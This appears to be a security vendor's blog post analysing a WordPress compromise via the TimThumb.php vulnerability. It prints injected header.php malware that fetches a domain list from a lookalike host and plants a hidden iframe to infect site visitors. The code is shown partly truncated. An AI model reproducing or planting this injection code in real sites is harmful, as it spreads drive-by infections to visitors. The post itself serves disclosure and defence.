We have been talking a lot lately about the Timthumb.php vulnerability and the importance of updating the script as soon as possible. Sites that didn’t update it are getting compromised very easily. We explained it in more detail here: Mass infection of WordPress sites because of TimThumb.php.
What we are seeing now is a small modification to the attack method. Instead of modifying the .htaccess or infecting the jquery.js or l10n.js scripts within WordPress core, they are modifying the header.php of the compromised WordPress site with this code:
<!– Wordpress Counter –>
if ( !is_user_logged_in() && !isset ( $_COOKIE[‘MTPT’] ) ) {if ( get_option ( ’domain_update’ ) === FALSE && ( $newdomain = ..
add_option ( ’domain’, $newdomain, ”, ’no’ );
add_option ( ’domain_update’, time (), ”, ’no’ );
if ( time () – get_option ( ’domain_update’ ) > 10*60 && ( $newdomain =..
update_option ( ’domain’, $newdomain );
update_option ( ’domain_update’, time () );
}$domain = get_option ( ’domain’ );
if ($domain)
‘<script language="javascript">
var ExpDate = new Date ();
ExpDate.setTime(ExpDate.getTime() + (7 * 24 * 60 * 60));
SetCookie("MTPT","1",ExpDate, "/");function SetCookie (name, value) {
var argv = SetCookie.arguments;
var argc = SetCookie.arguments.length;
var expires = (argc > 2) ? argv[2] : null;
var path = (argc > 3) ? argv[3] : null;
var domain = (argc > 4) ? argv[4] : null;
var secure = (argc > 5) ? argv[5] : false;
document.cookie = name + "=" + escape (value) +
((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
((path == null) ? "" : ("; path=" + path)) +
((domain == null) ? "" : ("; domain=" + domain)) +
((secure == true) ? "; secure" : "");
<iframe src="http://’ . $domain . ’/kwizhveo.php" width="1" height="1"
}function get_new_domain () {
$url = ’http://googlesafebrowsing.com/remoted.cc.txt’;
if ( function_exists ( ’curl_init’ ) ) {
$ch = @curl_init ( $url );
@curl_setopt ( $ch, CURLOPT_RETURNTRANSFER, TRUE );
$doms = @curl_exec ( $ch );
@curl_close ( $ch );
$doms = @file_get_contents ( $url );if ( strpos ( $doms, ’||’ ) === false )
return false;$domains = explode ( ’||’, trim ( $doms ) );
return $domains[array_rand ( $domains )];
?><!– Wordpress Counter –>
What this code does it very simple. It connects to http://googlesafebrowsing.com/remoted.cc.txt and extracts a domain to be used to hide a malicious iframe in attempt to infect everyone visiting the site:
(and many others)
All the domains are hosted at and in the .us.to top level domain. If your site is compromised, you can scan it here: http://sitecheck.sucuri.net.
If you need help cleaning up up, sign up here: http://sucuri.net/signup
Leave a reply